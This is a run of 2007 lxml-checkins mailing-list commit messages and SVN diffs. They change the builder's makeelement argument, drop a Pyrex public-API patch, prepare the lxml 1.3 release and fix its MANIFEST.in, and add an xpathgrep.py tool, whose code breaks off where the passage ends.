lxml/branch/lxml-1.3/src/lxml/builder.py Log: pass a makeelement() function instead of a parser Modified: lxml/branch/lxml-1.3/src/lxml/builder.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/builder.py (original) +++ lxml/branch/lxml-1.3/src/lxml/builder.py Sat Jun 23 09:31:48 2007 @@ -121,9 +121,10 @@ """ - def __init__(self, typemap=None, parser=None): - if parser is not None: - self._makeelement = parser.makeelement + def __init__(self, typemap=None, makeelement=None): + if makeelement is not None: + assert callable(makeelement) + 
self._makeelement = makeelement else: self._makeelement = ET.Element From scoder at codespeak.net Sat Jun 23 09:31:54 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 09:31:54 +0200 (CEST) Subject: [Lxml-checkins] r44462 - lxml/branch/html/src/lxml Message-ID: <20070623073154.48E07814C@code0.codespeak.net> Author: scoder Date: Sat Jun 23 09:31:54 2007 New Revision: 44462 Modified: lxml/branch/html/src/lxml/builder.py Log: pass a makeelement() function instead of a parser Modified: lxml/branch/html/src/lxml/builder.py ============================================================================== --- lxml/branch/html/src/lxml/builder.py (original) +++ lxml/branch/html/src/lxml/builder.py Sat Jun 23 09:31:54 2007 @@ -94,9 +94,10 @@ """ - def __init__(self, typemap=None, parser=None): - if parser is not None: - self._makeelement = parser.makeelement + def __init__(self, typemap=None, makeelement=None): + if makeelement is not None: + assert callable(makeelement) + self._makeelement = makeelement else: self._makeelement = ET.Element From scoder at codespeak.net Sat Jun 23 09:46:37 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 09:46:37 +0200 (CEST) Subject: [Lxml-checkins] r44463 - lxml/branch/lxml-1.3 Message-ID: <20070623074637.29A0E813E@code0.codespeak.net> Author: scoder Date: Sat Jun 23 09:46:36 2007 New Revision: 44463 Removed: lxml/branch/lxml-1.3/Pyrex-0.9.4.1-public-api.patch Log: drop Pyrex patch - not sufficient anyway Deleted: /lxml/branch/lxml-1.3/Pyrex-0.9.4.1-public-api.patch ============================================================================== --- /lxml/branch/lxml-1.3/Pyrex-0.9.4.1-public-api.patch Sat Jun 23 09:46:36 2007 +++ (empty file) @@ -1,239 +0,0 @@ -Index: Pyrex/Compiler/Nodes.py -=================================================================== ---- Pyrex/Compiler/Nodes.py (Revision 151) -+++ Pyrex/Compiler/Nodes.py (Arbeitskopie) -@@ -114,24 +114,28 @@ - 
self.generate_h_code(env, result) - - def generate_h_code(self, env, result): -- public_vars_and_funcs = [] -+ public_vars = [] -+ public_funcs = [] - public_extension_types = [] - for entry in env.var_entries: - if entry.visibility == 'public': -- public_vars_and_funcs.append(entry) -+ public_vars.append(entry) - for entry in env.cfunc_entries: - if entry.visibility == 'public': -- public_vars_and_funcs.append(entry) -+ public_funcs.append(entry) - for entry in env.c_class_entries: - if entry.visibility == 'public': - public_extension_types.append(entry) -- if public_vars_and_funcs or public_extension_types: -+ if public_vars or public_funcs or public_extension_types: - result.h_file = replace_suffix(result.c_file, ".h") - result.i_file = replace_suffix(result.c_file, ".pxi") - h_code = Code.CCodeWriter(result.h_file) - i_code = Code.PyrexCodeWriter(result.i_file) -+ header_barrier = "__HAS_PYX_" + env.module_name -+ h_code.putln("#ifndef %s" % header_barrier) -+ h_code.putln("#define %s" % header_barrier) - self.generate_extern_c_macro_definition(h_code) -- for entry in public_vars_and_funcs: -+ for entry in public_vars: - h_code.putln("%s %s;" % ( - Naming.extern_c_macro, - entry.type.declaration_code( -@@ -141,7 +145,23 @@ - for entry in public_extension_types: - self.generate_cclass_header_code(entry.type, h_code) - self.generate_cclass_include_code(entry.type, i_code) -+ if public_funcs: -+ for entry in public_funcs: -+ h_code.putln( -+ 'static %s;' % -+ entry.type.declaration_code("(*%s)" % entry.cname)) -+ i_code.putln("cdef extern %s" % -+ entry.type.declaration_code(entry.cname, pyrex = 1)) -+ h_code.putln( -+ "static struct {char *s; void **p;} _%s_API[] = {" % -+ env.module_name) -+ for entry in public_funcs: -+ h_code.putln('{"%s", &%s},' % (entry.cname, entry.cname)) -+ h_code.putln("{0, 0}") -+ h_code.putln("};") -+ self.generate_c_api_import_code(env, h_code) - h_code.putln("PyMODINIT_FUNC init%s(void);" % env.module_name) -+ h_code.putln("#endif /* 
%s */" % header_barrier) - - def generate_cclass_header_code(self, type, h_code): - #h_code.putln("extern DL_IMPORT(PyTypeObject) %s;" % type.typeobj_cname) -@@ -180,6 +200,7 @@ - self.body.generate_function_definitions(env, code) - self.generate_interned_name_table(env, code) - self.generate_py_string_table(env, code) -+ self.generate_c_api_table(env, code) - self.generate_typeobj_definitions(env, code) - self.generate_method_table(env, code) - self.generate_filename_init_prototype(code) -@@ -437,10 +458,12 @@ - dll_linkage = None - header = entry.type.declaration_code(entry.cname, - dll_linkage = dll_linkage) -- if entry.visibility <> 'private': -+ if entry.visibility == 'private': -+ storage_class = "static " -+ elif entry.visibility == 'extern': - storage_class = "%s " % Naming.extern_c_macro - else: -- storage_class = "static " -+ storage_class = "" - code.putln("%s%s; /*proto*/" % ( - storage_class, - header)) -@@ -1090,6 +1113,63 @@ - code.putln( - "};") - -+ def generate_c_api_table(self, env, code): -+ public_funcs = [] -+ for entry in env.cfunc_entries: -+ if entry.visibility == 'public': -+ public_funcs.append(entry.cname) -+ if public_funcs: -+ env.use_utility_code(c_api_import_code); -+ code.putln( -+ "static __Pyx_CApiTabEntry %s[] = {" % -+ Naming.c_api_tab_cname) -+ public_funcs.sort() -+ for entry_cname in public_funcs: -+ code.putln('{"%s", %s},' % (entry_cname, entry_cname)) -+ code.putln( -+ "{0, 0}") -+ code.putln( -+ "};") -+ -+ def generate_c_api_import_code(self, env, h_code): -+ # this is written to the header file! -+ h_code.put(""" -+ /* Return -1 and set exception on error, 0 on success. 
*/ -+ static int -+ import_%(name)s(PyObject *module) -+ { -+ if (module != NULL) { -+ PyObject *c_api_init = PyObject_GetAttrString( -+ module, "_import_c_api"); -+ if (!c_api_init) -+ return -1; -+ if (PyCObject_Check(c_api_init)) -+ { -+ int (*init)(struct {const char *s; const void **p;}*) = -+ PyCObject_AsVoidPtr(c_api_init); -+ if (!init) { -+ PyErr_SetString(PyExc_RuntimeError, -+ "module returns NULL pointer for C API call"); -+ return -1; -+ } -+ init(_%(name)s_API); -+ } -+ Py_DECREF(c_api_init); -+ } -+ return 0; -+ } -+ """.replace('\n ', '\n') % {'name' : env.module_name}) -+ -+ def generate_c_api_init_code(self, env, code): -+ public_funcs = [] -+ for entry in env.cfunc_entries: -+ if entry.visibility == 'public': -+ public_funcs.append(entry) -+ if public_funcs: -+ code.putln('if (__Pyx_InitCApi(%s) < 0) %s' % ( -+ Naming.module_cname, -+ code.error_goto(self.pos))) -+ - def generate_filename_init_prototype(self, code): - code.putln(""); - code.putln("static void %s(void); /*proto*/" % Naming.fileinit_cname) -@@ -1109,6 +1189,8 @@ - self.generate_intern_code(env, code) - #code.putln("/*--- String init code ---*/") - self.generate_string_init_code(env, code) -+ #code.putln("/*--- External C API setup code ---*/") -+ self.generate_c_api_init_code(env, code) - #code.putln("/*--- Global init code ---*/") - self.generate_global_init_code(env, code) - #code.putln("/*--- Type import code ---*/") -@@ -1862,10 +1944,12 @@ - dll_linkage = None - header = self.return_type.declaration_code(entity, - dll_linkage = dll_linkage) -- if self.visibility <> 'private': -+ if self.visibility == 'private': -+ storage_class = "static " -+ elif self.visibility == 'extern': - storage_class = "%s " % Naming.extern_c_macro - else: -- storage_class = "static " -+ storage_class = "" - code.putln("%s%s {" % ( - storage_class, - header)) -@@ -3550,6 +3634,7 @@ - - utility_function_predeclarations = \ - """ -+typedef struct {const char *s; const void **p;} __Pyx_CApiTabEntry; 
/*proto*/ - typedef struct {PyObject **p; char *s;} __Pyx_InternTabEntry; /*proto*/ - typedef struct {PyObject **p; char *s; long n;} __Pyx_StringTabEntry; /*proto*/ - static PyObject *__Pyx_UnpackItem(PyObject *, Py_ssize_t); /*proto*/ -@@ -3572,6 +3657,8 @@ - static PyObject *__Pyx_CreateClass(PyObject *bases, PyObject *dict, PyObject *name, char *modname); /*proto*/ - static int __Pyx_InternStrings(__Pyx_InternTabEntry *t); /*proto*/ - static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); /*proto*/ -+static int __Pyx_InitCApi(PyObject *module); /*proto*/ -+static int __Pyx_ImportModuleCApi(__Pyx_CApiTabEntry *t); /*proto*/ - """ - - get_name_predeclaration = \ -@@ -4056,3 +4143,37 @@ - """; - - #------------------------------------------------------------------------------------ -+ -+c_api_import_code = \ -+""" -+static int __Pyx_ImportModuleCApi(__Pyx_CApiTabEntry *t) { -+ __Pyx_CApiTabEntry *api_t; -+ while (t->s) { -+ if (*t->s == '\0') -+ continue; /* shortcut for erased string entries */ -+ api_t = %(API_TAB)s; -+ while ((api_t->s) && (strcmp(api_t->s, t->s) < 0)) -+ ++api_t; -+ if ((!api_t->p) || (strcmp(api_t->s, t->s) != 0)) { -+ PyErr_Format(PyExc_ValueError, -+ "Unknown function name in C API: %%s", t->s); -+ return -1; -+ } -+ *t->p = api_t->p; -+ ++t; -+ } -+ return 0; -+} -+ -+static int __Pyx_InitCApi(PyObject *module) { -+ int result; -+ PyObject* cobj = PyCObject_FromVoidPtr(&__Pyx_ImportModuleCApi, NULL); -+ if (!cobj) -+ return -1; -+ -+ result = PyObject_SetAttrString(module, "_import_c_api", cobj); -+ Py_DECREF(cobj); -+ return result; -+} -+""" % {'API_TAB' : Naming.c_api_tab_cname} -+#------------------------------------------------------------------------------------ -Index: Pyrex/Compiler/Naming.py -=================================================================== ---- Pyrex/Compiler/Naming.py (Revision 151) -+++ Pyrex/Compiler/Naming.py (Arbeitskopie) -@@ -50,5 +50,6 @@ - self_cname = pyrex_prefix + "self" - stringtab_cname = 
pyrex_prefix + "string_tab" - vtabslot_cname = pyrex_prefix + "vtab" -+c_api_tab_cname = pyrex_prefix + "c_api_tab" - - extern_c_macro = pyrex_prefix.upper() + "EXTERN_C" From scoder at codespeak.net Sat Jun 23 09:46:52 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 09:46:52 +0200 (CEST) Subject: [Lxml-checkins] r44464 - lxml/trunk Message-ID: <20070623074652.D32F3813E@code0.codespeak.net> Author: scoder Date: Sat Jun 23 09:46:52 2007 New Revision: 44464 Removed: lxml/trunk/Pyrex-0.9.4.1-public-api.patch Log: drop Pyrex patch - not sufficient anyway Deleted: /lxml/trunk/Pyrex-0.9.4.1-public-api.patch ============================================================================== --- /lxml/trunk/Pyrex-0.9.4.1-public-api.patch Sat Jun 23 09:46:52 2007 +++ (empty file) @@ -1,239 +0,0 @@ -Index: Pyrex/Compiler/Nodes.py -=================================================================== ---- Pyrex/Compiler/Nodes.py (Revision 151) -+++ Pyrex/Compiler/Nodes.py (Arbeitskopie) -@@ -114,24 +114,28 @@ - self.generate_h_code(env, result) - - def generate_h_code(self, env, result): -- public_vars_and_funcs = [] -+ public_vars = [] -+ public_funcs = [] - public_extension_types = [] - for entry in env.var_entries: - if entry.visibility == 'public': -- public_vars_and_funcs.append(entry) -+ public_vars.append(entry) - for entry in env.cfunc_entries: - if entry.visibility == 'public': -- public_vars_and_funcs.append(entry) -+ public_funcs.append(entry) - for entry in env.c_class_entries: - if entry.visibility == 'public': - public_extension_types.append(entry) -- if public_vars_and_funcs or public_extension_types: -+ if public_vars or public_funcs or public_extension_types: - result.h_file = replace_suffix(result.c_file, ".h") - result.i_file = replace_suffix(result.c_file, ".pxi") - h_code = Code.CCodeWriter(result.h_file) - i_code = Code.PyrexCodeWriter(result.i_file) -+ header_barrier = "__HAS_PYX_" + env.module_name -+ h_code.putln("#ifndef 
%s" % header_barrier) -+ h_code.putln("#define %s" % header_barrier) - self.generate_extern_c_macro_definition(h_code) -- for entry in public_vars_and_funcs: -+ for entry in public_vars: - h_code.putln("%s %s;" % ( - Naming.extern_c_macro, - entry.type.declaration_code( -@@ -141,7 +145,23 @@ - for entry in public_extension_types: - self.generate_cclass_header_code(entry.type, h_code) - self.generate_cclass_include_code(entry.type, i_code) -+ if public_funcs: -+ for entry in public_funcs: -+ h_code.putln( -+ 'static %s;' % -+ entry.type.declaration_code("(*%s)" % entry.cname)) -+ i_code.putln("cdef extern %s" % -+ entry.type.declaration_code(entry.cname, pyrex = 1)) -+ h_code.putln( -+ "static struct {char *s; void **p;} _%s_API[] = {" % -+ env.module_name) -+ for entry in public_funcs: -+ h_code.putln('{"%s", &%s},' % (entry.cname, entry.cname)) -+ h_code.putln("{0, 0}") -+ h_code.putln("};") -+ self.generate_c_api_import_code(env, h_code) - h_code.putln("PyMODINIT_FUNC init%s(void);" % env.module_name) -+ h_code.putln("#endif /* %s */" % header_barrier) - - def generate_cclass_header_code(self, type, h_code): - #h_code.putln("extern DL_IMPORT(PyTypeObject) %s;" % type.typeobj_cname) -@@ -180,6 +200,7 @@ - self.body.generate_function_definitions(env, code) - self.generate_interned_name_table(env, code) - self.generate_py_string_table(env, code) -+ self.generate_c_api_table(env, code) - self.generate_typeobj_definitions(env, code) - self.generate_method_table(env, code) - self.generate_filename_init_prototype(code) -@@ -437,10 +458,12 @@ - dll_linkage = None - header = entry.type.declaration_code(entry.cname, - dll_linkage = dll_linkage) -- if entry.visibility <> 'private': -+ if entry.visibility == 'private': -+ storage_class = "static " -+ elif entry.visibility == 'extern': - storage_class = "%s " % Naming.extern_c_macro - else: -- storage_class = "static " -+ storage_class = "" - code.putln("%s%s; /*proto*/" % ( - storage_class, - header)) -@@ -1090,6 +1113,63 @@ 
- code.putln( - "};") - -+ def generate_c_api_table(self, env, code): -+ public_funcs = [] -+ for entry in env.cfunc_entries: -+ if entry.visibility == 'public': -+ public_funcs.append(entry.cname) -+ if public_funcs: -+ env.use_utility_code(c_api_import_code); -+ code.putln( -+ "static __Pyx_CApiTabEntry %s[] = {" % -+ Naming.c_api_tab_cname) -+ public_funcs.sort() -+ for entry_cname in public_funcs: -+ code.putln('{"%s", %s},' % (entry_cname, entry_cname)) -+ code.putln( -+ "{0, 0}") -+ code.putln( -+ "};") -+ -+ def generate_c_api_import_code(self, env, h_code): -+ # this is written to the header file! -+ h_code.put(""" -+ /* Return -1 and set exception on error, 0 on success. */ -+ static int -+ import_%(name)s(PyObject *module) -+ { -+ if (module != NULL) { -+ PyObject *c_api_init = PyObject_GetAttrString( -+ module, "_import_c_api"); -+ if (!c_api_init) -+ return -1; -+ if (PyCObject_Check(c_api_init)) -+ { -+ int (*init)(struct {const char *s; const void **p;}*) = -+ PyCObject_AsVoidPtr(c_api_init); -+ if (!init) { -+ PyErr_SetString(PyExc_RuntimeError, -+ "module returns NULL pointer for C API call"); -+ return -1; -+ } -+ init(_%(name)s_API); -+ } -+ Py_DECREF(c_api_init); -+ } -+ return 0; -+ } -+ """.replace('\n ', '\n') % {'name' : env.module_name}) -+ -+ def generate_c_api_init_code(self, env, code): -+ public_funcs = [] -+ for entry in env.cfunc_entries: -+ if entry.visibility == 'public': -+ public_funcs.append(entry) -+ if public_funcs: -+ code.putln('if (__Pyx_InitCApi(%s) < 0) %s' % ( -+ Naming.module_cname, -+ code.error_goto(self.pos))) -+ - def generate_filename_init_prototype(self, code): - code.putln(""); - code.putln("static void %s(void); /*proto*/" % Naming.fileinit_cname) -@@ -1109,6 +1189,8 @@ - self.generate_intern_code(env, code) - #code.putln("/*--- String init code ---*/") - self.generate_string_init_code(env, code) -+ #code.putln("/*--- External C API setup code ---*/") -+ self.generate_c_api_init_code(env, code) - 
#code.putln("/*--- Global init code ---*/") - self.generate_global_init_code(env, code) - #code.putln("/*--- Type import code ---*/") -@@ -1862,10 +1944,12 @@ - dll_linkage = None - header = self.return_type.declaration_code(entity, - dll_linkage = dll_linkage) -- if self.visibility <> 'private': -+ if self.visibility == 'private': -+ storage_class = "static " -+ elif self.visibility == 'extern': - storage_class = "%s " % Naming.extern_c_macro - else: -- storage_class = "static " -+ storage_class = "" - code.putln("%s%s {" % ( - storage_class, - header)) -@@ -3550,6 +3634,7 @@ - - utility_function_predeclarations = \ - """ -+typedef struct {const char *s; const void **p;} __Pyx_CApiTabEntry; /*proto*/ - typedef struct {PyObject **p; char *s;} __Pyx_InternTabEntry; /*proto*/ - typedef struct {PyObject **p; char *s; long n;} __Pyx_StringTabEntry; /*proto*/ - static PyObject *__Pyx_UnpackItem(PyObject *, Py_ssize_t); /*proto*/ -@@ -3572,6 +3657,8 @@ - static PyObject *__Pyx_CreateClass(PyObject *bases, PyObject *dict, PyObject *name, char *modname); /*proto*/ - static int __Pyx_InternStrings(__Pyx_InternTabEntry *t); /*proto*/ - static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); /*proto*/ -+static int __Pyx_InitCApi(PyObject *module); /*proto*/ -+static int __Pyx_ImportModuleCApi(__Pyx_CApiTabEntry *t); /*proto*/ - """ - - get_name_predeclaration = \ -@@ -4056,3 +4143,37 @@ - """; - - #------------------------------------------------------------------------------------ -+ -+c_api_import_code = \ -+""" -+static int __Pyx_ImportModuleCApi(__Pyx_CApiTabEntry *t) { -+ __Pyx_CApiTabEntry *api_t; -+ while (t->s) { -+ if (*t->s == '\0') -+ continue; /* shortcut for erased string entries */ -+ api_t = %(API_TAB)s; -+ while ((api_t->s) && (strcmp(api_t->s, t->s) < 0)) -+ ++api_t; -+ if ((!api_t->p) || (strcmp(api_t->s, t->s) != 0)) { -+ PyErr_Format(PyExc_ValueError, -+ "Unknown function name in C API: %%s", t->s); -+ return -1; -+ } -+ *t->p = api_t->p; -+ ++t; -+ } -+ 
return 0; -+} -+ -+static int __Pyx_InitCApi(PyObject *module) { -+ int result; -+ PyObject* cobj = PyCObject_FromVoidPtr(&__Pyx_ImportModuleCApi, NULL); -+ if (!cobj) -+ return -1; -+ -+ result = PyObject_SetAttrString(module, "_import_c_api", cobj); -+ Py_DECREF(cobj); -+ return result; -+} -+""" % {'API_TAB' : Naming.c_api_tab_cname} -+#------------------------------------------------------------------------------------ -Index: Pyrex/Compiler/Naming.py -=================================================================== ---- Pyrex/Compiler/Naming.py (Revision 151) -+++ Pyrex/Compiler/Naming.py (Arbeitskopie) -@@ -50,5 +50,6 @@ - self_cname = pyrex_prefix + "self" - stringtab_cname = pyrex_prefix + "string_tab" - vtabslot_cname = pyrex_prefix + "vtab" -+c_api_tab_cname = pyrex_prefix + "c_api_tab" - - extern_c_macro = pyrex_prefix.upper() + "EXTERN_C" From scoder at codespeak.net Sat Jun 23 09:48:39 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 09:48:39 +0200 (CEST) Subject: [Lxml-checkins] r44465 - lxml/trunk/src/lxml Message-ID: <20070623074839.7C27D813E@code0.codespeak.net> Author: scoder Date: Sat Jun 23 09:48:39 2007 New Revision: 44465 Modified: lxml/trunk/src/lxml/xmlerror.pxi Log: comment Modified: lxml/trunk/src/lxml/xmlerror.pxi ============================================================================== --- lxml/trunk/src/lxml/xmlerror.pxi (original) +++ lxml/trunk/src/lxml/xmlerror.pxi Sat Jun 23 09:48:39 2007 @@ -480,7 +480,9 @@ # Constants are stored in tuples of strings, for which Pyrex generates very # efficient setup code. To parse them, iterate over the tuples and parse each -# line in each string independently. +# line in each string independently. Tuples of strings (instead of a plain +# string) are required as some C-compilers of a certain well-known OS vendor +# cannot handle strings that are a few thousand bytes in length. 
cdef object __ERROR_LEVELS __ERROR_LEVELS = ("""\ From scoder at codespeak.net Sat Jun 23 22:41:15 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 22:41:15 +0200 (CEST) Subject: [Lxml-checkins] r44476 - in lxml/branch/lxml-1.3: . doc Message-ID: <20070623204115.2004180A9@code0.codespeak.net> Author: scoder Date: Sat Jun 23 22:41:13 2007 New Revision: 44476 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/doc/main.txt Log: prepare release of 1.3 Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Sat Jun 23 22:41:13 2007 @@ -2,8 +2,8 @@ lxml changelog ============== -Under development -================= +1.3 (2007-06-24) +================ Features added -------------- Modified: lxml/branch/lxml-1.3/doc/main.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/main.txt (original) +++ lxml/branch/lxml-1.3/doc/main.txt Sat Jun 23 22:41:13 2007 @@ -129,7 +129,7 @@ .. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ .. _`this key`: pubkey.asc -The latest version is `lxml 1.3`_, released 2007-06-XX (`changes for 1.3`_). +The latest version is `lxml 1.3`_, released 2007-06-24 (`changes for 1.3`_). `Older versions`_ are listed below. .. 
_`Older versions`: #old-versions From scoder at codespeak.net Sun Jun 24 12:31:54 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 24 Jun 2007 12:31:54 +0200 (CEST) Subject: [Lxml-checkins] r44478 - lxml/tag/lxml-1.3 Message-ID: <20070624103154.CD4CE80E9@code0.codespeak.net> Author: scoder Date: Sun Jun 24 12:31:53 2007 New Revision: 44478 Added: lxml/tag/lxml-1.3/ - copied from r44477, lxml/branch/lxml-1.3/ Log: 1.3 release tag From scoder at codespeak.net Sun Jun 24 13:59:04 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 24 Jun 2007 13:59:04 +0200 (CEST) Subject: [Lxml-checkins] r44479 - in lxml/trunk: . doc Message-ID: <20070624115904.263F1811E@code0.codespeak.net> Author: scoder Date: Sun Jun 24 13:59:02 2007 New Revision: 44479 Modified: lxml/trunk/CHANGES.txt lxml/trunk/doc/main.txt Log: release merges from 1.3 Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Sun Jun 24 13:59:02 2007 @@ -2,12 +2,25 @@ lxml changelog ============== -Under Development +Under development ================= Features added -------------- +Bugs fixed +---------- + +Other changes +------------- + + +1.3 (2007-06-24) +================ + +Features added +-------------- + * Parsers take a ``remove_comments`` keyword argument that skips over comments * Entity support through an ``Entity`` factory and element classes. XML Modified: lxml/trunk/doc/main.txt ============================================================================== --- lxml/trunk/doc/main.txt (original) +++ lxml/trunk/doc/main.txt Sun Jun 24 13:59:02 2007 @@ -129,7 +129,7 @@ .. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ .. _`this key`: pubkey.asc -The latest version is `lxml 1.3`_, released 2007-06-XX (`changes for 1.3`_). +The latest version is `lxml 1.3`_, released 2007-06-24 (`changes for 1.3`_). 
`Older versions`_ are listed below. .. _`Older versions`: #old-versions From scoder at codespeak.net Sun Jun 24 14:00:43 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 24 Jun 2007 14:00:43 +0200 (CEST) Subject: [Lxml-checkins] r44480 - lxml/trunk Message-ID: <20070624120043.1D871811E@code0.codespeak.net> Author: scoder Date: Sun Jun 24 14:00:42 2007 New Revision: 44480 Modified: lxml/trunk/MANIFEST.in Log: only integrate the necessary Pyrex modules Modified: lxml/trunk/MANIFEST.in ============================================================================== --- lxml/trunk/MANIFEST.in (original) +++ lxml/trunk/MANIFEST.in Sun Jun 24 14:00:42 2007 @@ -9,6 +9,8 @@ recursive-include src/lxml/tests *.rng *.xslt *.xml *.dtd recursive-include benchmark *.py recursive-include doc *.txt *.html *.css *.xml *.mgp pubkey.asc -recursive-include Pyrex *.py +include Pyrex/__init__.py +recursive-include Pyrex/Compiler *.py +recursive-include Pyrex/Distutils *.py include doc/mkhtml.py doc/rest2html.py exclude doc/pyrex.txt src/lxml/etree.pxi From scoder at codespeak.net Sun Jun 24 17:21:01 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 24 Jun 2007 17:21:01 +0200 (CEST) Subject: [Lxml-checkins] r44483 - lxml/trunk Message-ID: <20070624152101.9C4D68125@code0.codespeak.net> Author: scoder Date: Sun Jun 24 17:21:01 2007 New Revision: 44483 Modified: lxml/trunk/MANIFEST.in Log: missing .c file in source archive Modified: lxml/trunk/MANIFEST.in ============================================================================== --- lxml/trunk/MANIFEST.in (original) +++ lxml/trunk/MANIFEST.in Sun Jun 24 17:21:01 2007 @@ -5,7 +5,7 @@ include MANIFEST.in version.txt include CHANGES.txt CREDITS.txt INSTALL.txt LICENSES.txt README.txt TODO.txt recursive-include src *.pyx *.pxd *.pxi *.py -recursive-include src/lxml etree.c objectify.c etree.h etree_defs.h +recursive-include src/lxml etree.c objectify.c pyclasslookup.c etree.h etree_defs.h 
recursive-include src/lxml/tests *.rng *.xslt *.xml *.dtd recursive-include benchmark *.py recursive-include doc *.txt *.html *.css *.xml *.mgp pubkey.asc From scoder at codespeak.net Sun Jun 24 17:21:30 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 24 Jun 2007 17:21:30 +0200 (CEST) Subject: [Lxml-checkins] r44484 - lxml/branch/lxml-1.3 Message-ID: <20070624152130.56E468125@code0.codespeak.net> Author: scoder Date: Sun Jun 24 17:21:29 2007 New Revision: 44484 Modified: lxml/branch/lxml-1.3/MANIFEST.in Log: missing .c file in source archive Modified: lxml/branch/lxml-1.3/MANIFEST.in ============================================================================== --- lxml/branch/lxml-1.3/MANIFEST.in (original) +++ lxml/branch/lxml-1.3/MANIFEST.in Sun Jun 24 17:21:29 2007 @@ -5,7 +5,7 @@ include MANIFEST.in version.txt include CHANGES.txt CREDITS.txt INSTALL.txt LICENSES.txt README.txt TODO.txt recursive-include src *.pyx *.pxd *.pxi *.py -recursive-include src/lxml etree.c objectify.c etree.h etree_defs.h +recursive-include src/lxml etree.c objectify.c pyclasslookup.c etree.h etree_defs.h recursive-include src/lxml/tests *.rng *.xslt *.xml *.dtd recursive-include benchmark *.py recursive-include doc *.txt *.html *.css *.xml *.mgp pubkey.asc From scoder at codespeak.net Mon Jun 25 10:27:46 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 10:27:46 +0200 (CEST) Subject: [Lxml-checkins] r44497 - in lxml/trunk: . src/lxml Message-ID: <20070625082746.2A46C80F3@code0.codespeak.net> Author: scoder Date: Mon Jun 25 10:27:45 2007 New Revision: 44497 Modified: lxml/trunk/INSTALL.txt lxml/trunk/src/lxml/etree.pyx Log: comments on libxml2 versions Modified: lxml/trunk/INSTALL.txt ============================================================================== --- lxml/trunk/INSTALL.txt (original) +++ lxml/trunk/INSTALL.txt Mon Jun 25 10:27:45 2007 @@ -11,6 +11,8 @@ * libxml 2.6.20 or later. 
It can be found here: http://xmlsoft.org/downloads.html + If you want to use XPath reliably, try to avoid libxml2 2.6.27. + * libxslt 1.1.15 or later. It can be found here: http://xmlsoft.org/XSLT/downloads.html Modified: lxml/trunk/src/lxml/etree.pyx ============================================================================== --- lxml/trunk/src/lxml/etree.pyx (original) +++ lxml/trunk/src/lxml/etree.pyx Mon Jun 25 10:27:45 2007 @@ -1426,7 +1426,7 @@ FTP. Note that XInclude does not support custom resolvers in Python space - due to restrictions of libxml2 <= 2.6.28. + due to restrictions of libxml2 <= 2.6.29. """ cdef python.PyThreadState* state cdef int result From scoder at codespeak.net Mon Jun 25 10:27:56 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 10:27:56 +0200 (CEST) Subject: [Lxml-checkins] r44498 - lxml/trunk/tools Message-ID: <20070625082756.A501280F3@code0.codespeak.net> Author: scoder Date: Mon Jun 25 10:27:56 2007 New Revision: 44498 Added: lxml/trunk/tools/ lxml/trunk/tools/xpathgrep.py Log: new subdirectory to collect some command line tools Added: lxml/trunk/tools/xpathgrep.py ============================================================================== --- (empty file) +++ lxml/trunk/tools/xpathgrep.py Mon Jun 25 10:27:56 2007 @@ -0,0 +1,218 @@ +#!/usr/bin/env python + +import lxml.etree as et +import sys, os.path, optparse, itertools + +SHORT_DESCRIPTION = "An XPath file finder for XML files." + +__doc__ = SHORT_DESCRIPTION + ''' + +Evaluates an XPath expression against a series of files and prints the +matching subtrees to stdout. 
+ +Examples:: + + $ cat test.xml + + + + + + + # find all leaf elements: + $ SCRIPT '//*[not(*)]' test.xml + + + + + # find all elements with attribute values containing "abc" ignoring case: + $ SCRIPT '//*[@*[contains(py:lower(.), "abc")]]' test.xml + + + + + # find all numeric attribute values: + $ SCRIPT '//@*[re:match(., "^[0-9]+$")]' test.xml + 1234 + + * find all elements with numeric attribute values: + $ SCRIPT '//*[@*[re:match(., "^[0-9]+$")]]' test.xml + + + * find all elements with numeric attribute values in more than one file: + $ SCRIPT '//*[@*[re:match(., "^[0-9]+$")]]' test.xml test.xml test.xml + >> test.xml + + >> test.xml + + >> test.xml + + + * find XML files that have non-empty root nodes: + $ SCRIPT -q '*' test.xml test.xml test.xml + >> test.xml + >> test.xml + >> test.xml + + * find out if an XML file has at most depth three: + $ SCRIPT 'not(/*/*/*)' test.xml + True + +'''.replace('SCRIPT', os.path.basename(sys.argv[0])) + +REGEXP_NS = "http://exslt.org/regular-expressions" +PYTHON_BUILTINS_NS = "PYTHON-BUILTINS" + +parser = et.XMLParser(remove_blank_text=True) + +def print_results(results): + if isinstance(results, basestring) or isinstance(results, bool): + print results + return + + for result in results: + if isinstance(result, basestring) or isinstance(result, bool): + print result + else: + print et.tostring( + result, + xml_declaration=False, + pretty_print=True) + +def find_in_file(f, xpath, print_name=True, xinclude=False): + if hasattr(f, 'name'): + filename = f.name + else: + filename = f + + try: + try: + tree = et.parse(f, parser) + except IOError, e: + print >> sys.stderr, "ERR: parsing %r failed: %s: %s" % ( + filename, e.__class__.__name__, e) + return False + + try: + if xinclude: + tree.xinclude() + except IOError, e: + print >> sys.stderr, "ERR: XInclude for %r failed: %s: %s" % ( + filename, e.__class__.__name__, 